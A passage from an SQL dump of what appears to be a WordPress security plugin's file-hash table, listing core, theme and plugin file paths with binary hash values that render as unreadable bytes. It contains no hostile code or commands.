d��껅2��_�r','wp-includes/functions.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�GQ\0���[��� �9','E�Z�H����Ruj�X{L��oy�X`	Y��鈨','',0,'?'),('h0X-�i����^�G`8','wp-includes/pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pq�����EyJ�$��','�Y�֋Y\0+IBNvk�dE&��Bp����F�','',0,'?'),('h4���#3�`�-݈�\"�','wp-admin/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0��,���g;ꙴ','�C��q��N,�`v�S��*���Z[�`���m�','',0,'?'),('h5�fY��`��|&�','wp-content/themes/graduate/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�p��]iu�%�','�^�3��Gg�y������k�J�n\",K�','',0,'?'),('h@Z�%�R�F�;ti\\m','wp-admin/css/login-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A��u�\n�xv6�','��Vk�\n&B����S2�w@��UG�ƺ����?�','',0,'?'),('hE�ӛ���ְzs��','wp-content/themes/enigma/images/recent-post-pro.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ε��-��#���{','�߮����0�Jj��!��*>.��Sy�t\r','',0,'?'),('hZ\\+Y�@VVh<{8�','wp-content/themes/catch-responsive/inc/customizer-includes/upgrade-button/class-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��E���ƞ*\\#�','��AK�װ�?0����\r�r���v�q','',0,'?'),('hkсLC,��S���yUg','wp-content/themes/Kent/js/jquery.flexslider.js',0,'K���:\"W#R��b�','K���:\"W#R��b�','Ñv\nq�o�\r�1�l��!�4d[�%o�x���','',0,'?'),('hp��{��b>\r�Z�\Z','wp-content/themes/catch-responsive/css/genericons/genericons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'D���y33>K ',')��@ �ѵv�P�4\\W*Y�\'�-c�|����','',0,'?'),('h|hE��f:Ʊ2��~','wp-admin/network/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','堷ȹ����H^r�','�f�kL��\Z�)h/F_��M�9�j���V�','',0,'?'),('h�J��E��^�&�','wp-content/themes/simpleshift/assets/images/preview/184x184-3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z 5dըfp����n�','�0�]�N�Cg9ǣ�T ]}�[�A��e���v���','',0,'?'),('h��E�}[�\'�p88*N','wp-content/themes/the-best/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5;/L!�hN�_��F','���:��Р/;���b��=���X��A:ʈ,I�','',0,'?'),('h���9�y���R#','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/AUTHORS',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2OJSIܑ��68Ѻc	','��QG�l0͆�^��7ȉ8�;ET��!_upB','',0,'?'),('h�=쮁�F�:���','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ù[�T�����r','�Z�\\U��`��c5��L\r[�s�y���}}','',0,'?'),('h��~cTOo�y4|','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f\"����#6${ JL\'\"','�eŇ�6\Z(�q�&�ڶ���]���\n�Cli�ީ�','',0,'?'),('h�<�]���OpNCƴ�','wp-content/plugins/wordfence/lib/wordfenceURLHoover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w���Z�\\��;�O�','�|�.h��.��+\r	1�C\'�m��h$x(���','',0,'?'),('h��r���/�B�\'�0','wp-content/themes/twentynineteen/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�x��4�Ҫ���','d�@����d%�1M���Mo6��1����Vk','',0,'?'),('h��]n,�����m:��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-registration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	&�A�2+9\\[�','�g��C�}؞���gv���c��N��Q�py��','',0,'?'),('h�������m;�Ya�','wp-content/themes/authorize/assets/stylesheets/font-awesome/scss/font-awesome.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UY!mTc\n��aƸ=','\'����:;�U��\"k�M�#�I@�+y��_�','',0,'?'),('h�6;Ғ�c%����7','wp-content/themes/twentytwentyone/assets/images/the-garden-at-bougival-1884.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��߱�l�\Zp���\"�','�?�fD�\r��5ק�	��ߋ�ޙ���J�6�qm','',0,'?'),('h���QK�V<r:Mg_��','wp-includes/js/dist/format-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ԯ䠦_��P^����','#H����X�{��M\'���%��&6�D.̺x','',0,'?'),('h�?����]�6,\Z�S��','wp-content/themes/singularity/inc/customizer-library/extensions/sanitization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^~�57�@T�G','Cg{������ֱ��Ts48G:q��','',0,'?'),('h�`�sN�W�����L�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/css/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]@��C�J�Po�h','�A��{�\'�L���\\t7�EX�fꙁ$��','',0,'?'),('i��T���UB��o�\n�','wp-content/themes/authorize/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��˥�b�!p��eDi��','�s�~8�^pDJs�!A��J�n��aB��ȕA�','',0,'?'),('i1�c��2XU�\"ȡ\'','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/runmode/runmode-standalone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��TH�ߵ?�<��t�','@%��C�M��7���+�!GJ�z�E�%^<��_','',0,'?'),('i����kmCx�ʷ��','wp-content/plugins/wordfence/lib/wfDashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��.��q�:�j��R','u�a�v�R���+We\r�T�J%�\"�\r7�f���','',0,'?'),('i6��m�K챽9r�','wp-content/themes/weblog/acmethemes/customizer/design-options/blog-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ȼ>l������Fi�','��·pr��H��\0��sxj�2Qg{acGZ���','',0,'?'),('i����Юqh^��m','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-slider-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l7M6Zb��\n9=�','��7&�s�f?��0!���7��\0�t��w�z�','',0,'?'),('i��;�&��o�?','wp-includes/IXR/class-IXR-base64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*6���D�T�e��','?F]L�2}���\rS�@b�2�O�o�uU\'O��','',0,'?'),('i& P�ׄ��\Z��/9','wp-content/themes/weblog/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8^����ow����','Ɔ�j1�X�7�K�IS~��F�!P�}]�	','',0,'?'),('i4�^v�zs�n�\Z�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-difficulty-badge-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rڦ�+޲`Ovh','�p_J�9��]3!\r\'?�Ja)�t1E_�������','',0,'?'),('iI��df��e�2r�A','wp-content/themes/city-store/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�\"^(�G}�%$�$�','$r�c��H���dZWr��,�@.ʟ�L�Gٕ�','',0,'?'),('iLUa�9(�bN��^','wp-content/themes/quicksand/inc/QuicksandNavwalker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�T��>K�\'%O�s�','ю��B���_:��՜�o�$��`T�@B�V�T','',0,'?'),('iP��7)�{G��','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/monokai.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W્{�N��1�p����',' d��P��]^J�\\�L\"&�،Q��׭<�3�it','',0,'?'),('i\\�4W��2�4��>�','wp-content/themes/twentytwentyone/.stylelintrc.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�S�e�ۋ-/','�����I\r�ަ,�/,V�����ɩ�ӄ%','',0,'?'),('ia{�-��\Z�ؙo��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�<��܎�s��9','��Q�\'�r�� �t7��=s*a`<�z�o�_','',0,'?'),('ii�\"o�C����`','wp-includes/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Rz@�MMQmr���','�q���X9O���a4�A�����\'���̾e','',0,'?'),('ii�^��[s0�����','wp-content/themes/auberge/assets/css/slick.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��r�=Y2p@Y','�sIx’���GR`X��[\"B�4��Z5	L�]','',0,'?'),('i����,�qg�u�Y��x','wp-content/themes/graphene/images/social/plurk.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\E_w,��m��G','��F��^-��\'�C�T0us����R��','',0,'?'),('i��q����xjpR��','wp-content/themes/twentytwenty/template-parts/featured-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�����{�κ','�F�\"�ט�VX����R�H�^�v,\"o��','',0,'?'),('i��K\Z0:C�M�G�','wp-content/themes/catch-flames/inc/panel/images/no-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hX�,\0؀/&�R��_�','KO~+B�5W_Ռ��CD�\\w�\r�?���I�','',0,'?'),('i�-��X�8V[~E�','wp-admin/css/install-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�H�a})Β��;��~s','�3�&d)��s\Z<7æa�v�y�7�v�~����','',0,'?'),('i���u�\n:^�o�.�','wp-content/themes/skt-pathway/images/separator.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'���\rg�Q�?��','sq@�*%��X�w��vZ�R�~����1x�','',0,'?'),('i��D�qr\n��\0��7','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/multicheck.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/�q~t\\m9:?Z�','��CSe��yC:ү|��۩J4�$�Ji�w!\0(c','',0,'?'),('i�\\����=X�h$','wp-admin/js/language-chooser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӥ�ku��lLS�','��r4��i���j�\"܈�����6���&','',0,'?'),('i�k���C��T,�','wp-content/plugins/wordfence/lib/wfIPWhitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�h��2aE��0','�D�:�]踝z����w%[�j�o����X`�','',0,'?'),('i�*eW�3Z{Mp\'$+=','wp-content/themes/saybusiness/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V>������J�h�{�8','��[[���I�	�{uG���	\nL�4}�G�s','',0,'?'),('i�Թ/��s�(?�z','wp-content/plugins/wp-cerber/assets/flags/pl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�؍�J������S�$','�-v_ꉱ�N��M+o����	�cx��D]�','',0,'?'),('i�rHFn���A\n�AS�=','wp-content/plugins/wp-cerber/assets/select2/dist/css/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�AO���K��o�t�','�������lN_-�\n��|\r蒝vy�$k','',0,'?'),('i��Q3p�8g����<','wp-content/themes/quicksand/js/lightgallery/css/lightgallery.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','08�x*k�g�u�<dU�','�w�.��d�IK������vl�t���\0\"\Z','',0,'?'),('jH\r�=bwҖe�o`x','wp-content/themes/wp-simple/inc/kirki/kirki/includes/output/property/class-kirki-output-property-background-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iI�I&k��q�B���C�','Y�´���(��sK�{�!��J���j0�M�m���','',0,'?'),('j#G��m\n&��c�-�','wp-content/themes/lovecraft/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;�YgW\\��/	��d','�TKX�fZ,�43<���-ԇ��q�-�U̯��ɤ','',0,'?'),('j&�V1���6�4����','wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���r��9 �#��{�','ᄆ��n�ѿ�0c~N��r��Au�g~Δ���I','',0,'?'),('j/!�*�Ƈ��`���','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-dimension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l���������`2�','s��ȋx��ǫ�pL�>��E	�*j�9��*fE','',0,'?'),('j3]p���B���R!I�q','wp-content/plugins/wp-cerber/assets/flags/cr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v.\Zg����9V��','t~���� V�7�V���L�$D\0��p;\"�\ZX��1','',0,'?'),('j3��fu2s��2���','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/tern/tern.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�e���	�Fs�','���L>�.\\c3h���>����U���NT�Z','',0,'?'),('j=TlpHv�Qy�K�b/','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/bin/compress',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a1b�+ݴ�N�%s','���=��}�0�X�ډ�mbQ����`��q','',0,'?'),('jE�c����� ����I�','wp-content/themes/graphene/images/social/creativecommons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D|<�RX=��x�y4\r','m���麖��z�ƠdR�W��{mMw�l�ϕ�','',0,'?'),('jQ����pPtQ�}��r','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/switch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�oo\ZFK\0�B��a','��X=+�>dS����fPu�h�s����}:L�','',0,'?'),('jQ���e���;�e','wp-includes/css/wp-pointer-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k�d�\\n�Ue�S@','������7�Z%\0L�|��I�`��?{hl�G�\\','',0,'?'),('j`mR)\Z�bCtv�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/mode/loadmode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<)����x[knok|','!�t+ik`��C��\\\"�ΆFq��s|I;z�2','',0,'?'),('jb��3S\n�����!�','wp-content/themes/singularity/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"�\0�5Y/�7\Z���','��?�\0�5Z�s�OX-���)!�2+�)H$� ','',0,'?'),('jmE��AX�uw�>܆','wp-admin/css/colors/ectoplasm/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���f�+�#k�','����z\Z��O��3΢����}*�i�u`�!','',0,'?'),('j�䱋����%���]�','wp-includes/class-wp-xmlrpc-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�.d��\rZ�D�6','���f���ɝq?��pRv�u�Ȣ�','',0,'?'),('j�_m�EQ�,��k�','wp-content/themes/twentytwenty/template-parts/entry-author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~N��{M5�D���','R������{��X�g��ɍ�1T~���=','',0,'?'),('j����p�\0Z��','wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Z�xu�t�\n��x�','��p!ŗ$�����<�#|j��f�#�-z�','',0,'?'),('j��F!����䗯�','wp-content/themes/advance/inc/kirki/assets/images/2cr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MF�v\Z��x2�t','�1�-�$��:O���y!�:ke(�ײ����w�','',0,'?'),('j���)n�Q8ޮ�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�v��\\W�%A�E6$�','���G0n�eiLՀ�P���}�9� R��rP��','',0,'?'),('j�E��M�d��f�','wp-content/themes/exoplanet/functions/js/customizer-scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\';o}ik�����SK�6','H2�\Zی���>�/��Aװ!�����jb��','',0,'?'),('j����5F+���o','wp-includes/images/crystal/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�m`��`�9��','$����멘<x1��Փ��IR�V-VZ\\jg.���','',0,'?'),('j���^LM�\Z��1h)','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/keymap/vim.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�bs�������~k�','�8��xA�`,��0�au��;?ORO��j���','',0,'?'),('j��@�dq7���:','wp-content/themes/wp-simple/inc/kirki/assets/js/tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�L`CO����rk�','|]��yX�E��G�@��w!2��Ѣ�(','',0,'?'),('j�a$�	?h��`�R�','wp-content/plugins/wordfence/css/wf-adminbar.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0����\"CϷ�Tb�','h�S䘷*g�5��)!���}�Bl�N�E�','',0,'?'),('j��4-�O Մ��rL\n','wp-content/plugins/wordfence/models/block/wfRateLimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$1�D�\'w��m���','E&&\n��a���~�b+\Z���)j��M�p��M�','',0,'?'),('j�gs�66�$��8*�E�','wp-includes/class-wp-dependency.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���NV}��b.\'�5m','�[�4M�,�4�ܓ�x�wBB̕=Bg��}I�l�','',0,'?'),('jÓ�?k1�L��W�& ','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/lint/html-lint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n=tF�1���C&\Z�','o�-�Ei�� *�pF�`�I����g��q��)�.','',0,'?'),('j�_�8�QKM��;�','wp-content/themes/catch-responsive/inc/catchresponsive-structure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�z�K�-��roDK�','�X-F�@��(�ۦ�����(��xU��89M','',0,'?'),('j麡ř��Nޫuwc��','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����+PLh��h��_�','�/���+�B��&J�:ť�f�D��J+ ����','',0,'?'),('j�KI���I�M�-WT2\n','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/scroll/scrollpastend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�m��z�f������','.�ik�N���ܱ�@�?*Cϲ�Qp��X���*','',0,'?'),('k����E���/R�','wp-content/themes/simpleshift/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��3%T8V�`9t','�!f�l��b3o^²��H?{ۄ��թ','',0,'?'),('k1=��T`��SS��','wp-content/themes/enigma/images/photo-pro.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��dq�*��>�T[�','9�H=�h/$?Q�tb�G�BD���gש�t','',0,'?'),('k���$6O��-N�x�','wp-includes/js/tinymce/plugins/charmap/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=B�쟄��P\rL��','•�x[�G��-�90b.z�G��az�>�r','',0,'?'),('kF�K��36<�>�%�','wp-content/themes/graphene/tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�\'==e鴁���','ƹB@��������y*������~=m�}','',0,'?'),('k%�\r0̯�IN6�D\'�y','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�+�ک�d�ݬ@��','w�bj�Y����S����tc��� ��I��dQ','',0,'?'),('k-x_��G/7�;�H1n�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/sql/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�&$�_Vҹ3\'��B�','s)>�r��\"�?!ؑ-��֏��A��P���}�','',0,'?'),('k6���*���H�	�u١','wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�}��I�F�ty�','p�\r�G$��M��,�F7\rC�\\^��,�[tdΎ','',0,'?'),('kG�`��?Wvǫ��3','wp-content/themes/city-store/assets/js/source/city-store-slider-setting.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TZ�}��\Z{��*','�l�|��~�0K͕gB͹A�<�/�.:+��Y�v','',0,'?'),('kK1��KZX���\n#n[','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/search/matchesonscrollbar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',���:�4��p���a','�L�p��+]+�9��	�d���g|���f���','',0,'?'),('kM������̙Ysp','wp-admin/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����D�G��','����+��*ە�ۦE�J�%\"���HID�-�','',0,'?'),('ka��b+=Gm����','wp-content/themes/enigma/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ˣ<vB�ߣ�Jrb�','A��0F�j�h��]��u��H\n��k���u\r$�?','',0,'?'),('km�|��Kma0�\"*�k','wp-admin/js/tags-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�ͨ�p���d����','�r0�\"��l\n�E�ݴ�*�7��vL�{d','',0,'?'),('k|��P�C�I�\\U�','wp-content/themes/catch-flames/colors/dark.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�UJ�\r�g�^��','�ʼğ�?�A�H���#�@�z\r|.��{�ey�','',0,'?'),('k}:����VN����G','wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x>P��H�e6�[GF�5�','��q!�홐��%ހP٧��H��r�.�L��~','',0,'?'),('k��5�	��-�\\��:M�','wp-content/themes/lovecraft/js/doubletaptogo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ѵ|�Ƙ���\r��','�}l���j��(�ʰ��T&���yv��W�G~�','',0,'?'),('k��#��7B+���G','wp-content/themes/weblog/acmethemes/customizer/options/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u�� y���R��y�','4X!��,SC��(m�}�����4�QɄ+','',0,'?'),('k��+NfL�H�H@%2�','wp-content/themes/event/js/color-scheme-control.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R�nP-��6�W�','O#:�yߊr%�`�(_�\ZV�P��-ب��/�','',0,'?'),('k��1���/�͓ݐ%=�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dq�d6�+\"��U���','�I����s;֮����i����k���E�@�)','',0,'?'),('k�Q��@E!�H�J��','wp-content/themes/wp-simple/inc/kirki/assets/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��g�c���e#�QF�','�S��;*R\Z\'z�Q���_]D��g�]���539\'�%','',0,'?'),('k��,��+b<���ȆO','wp-content/themes/auberge/template-parts/menu-social.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�ntQ��5�i���+','�^�XD�\"j�G�&�K�ð���R�v)|�','',0,'?'),('k������?�����<','wp-content/themes/edge/js/html5.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�^w�jđ�Tp�F�','భ�`^�]�M��KyE���&��dy�������','',0,'?'),('k��B˞�b=y��','wp-includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�λ���4S�����',' BN+3Yj��}�Te�:�g\0t&�*�Į�i�','',0,'?'),('k��(����	�G��o','wp-content/themes/advance/inc/admin/welcome-screen/sections/getting-started.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qg�8��b�w�iD��','M�E����IF�BK���0GWS�o2S\'��\"�¢I','',0,'?'),('k“��U/�^���� ','wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��֟0}_���','�O�+�WE��(\Zvl�%`���¢�x�6��n� ','',0,'?'),('kۚ��	#푥s�ePY�','wp-content/plugins/wp-cerber/assets/flags/kn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�\Z�׋��%q�$�','�g-)�ASZ�v�Z��-<��.aءU�ن+�','',0,'?'),('kީ_�#��r\"��1�G�','wp-content/themes/hitmag/template-magazine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�ZV`��R��쩛�6�','ha[5_�Ԇ���f���\\���>��F�s���ߪ','',0,'?'),('k�\'\n+&=��n`�3�','wp-includes/js/dist/dom-ready.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�N�M8�![��c','O\\�Ű|�~2Zce��L\"�kOM�s�g(�\Z�','',0,'?'),('k�1�~�R�xOj���','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gݐ3���}\'fG���','LOY�}<2��8����\Z�s�����_��N�','',0,'?'),('k���|m��Զ�?�a','wp-content/themes/enigma/css/font-awesome-4.7.0/less/bordered-pulled.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v�2��!���','�+l6\Z�KH1�~�VV ���C�g�p�w;� ','',0,'?'),('k�=T�g�q�6k��\Z','wp-content/themes/advance/inc/kirki/includes/panels/class-kirki-panels-expanded-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x��t�\\�����%s[d','��$�o��Z�X�\'ՍI�k�0�;ov<>�]��','',0,'?'),('l7�N��<߳VʦZ�','wp-content/themes/twentytwentyone/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�nu���G-t�\n�1�','��q��3#������Sr�c:׹w�L�','',0,'?'),('l�8�Q���&m�}�Yp','wp-content/themes/hitmag/inc/kirki/assets/images/3cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o��i�#�2�:V','߰-t���:�uq�m��\\�VQ���L\'��G[@�%','',0,'?'),('lMFƨ���|�v�f$','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-checkbox-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lԍ����Z��2gu','z6�Up�^$(J,m]��y�v*�(��\r�t�','',0,'?'),('l+�O/|��ۙ�f[z','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Sno��P��/���',',®�%�4&ʐw�l�1(9g�c�����s','',0,'?'),('l/\n�Ԁ�W�ͱ-c�','wp-includes/widgets/class-wp-widget-recent-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d���j�F����3','5���s�	��O>���{��ĩ�2�!�.�1��','',0,'?'),('l2�B��l��`��:�4]','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/javascript/typescript.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ijoi|,zT�s�H�','�����f�/�EB�]#_3툶�sN�7z�\r��','',0,'?'),('l9��=��h�,>���&','wp-content/plugins/wordfence/lib/wfDiagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0I����H���pz��','\n�ö\'������%���?��Zyޘ{���','',0,'?'),('lFF���v�:U�r','wp-content/themes/Endolf/FT/plugin/options-framework/includes/class-options-interface.php',0,'������f�˰[��#','������f�˰[��#','W�����AH�zB��01L�GN�x�X0Q`','',0,'?'),('lH_�!�#�\"�|�g�0','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uθ��\"��','N�\r��v�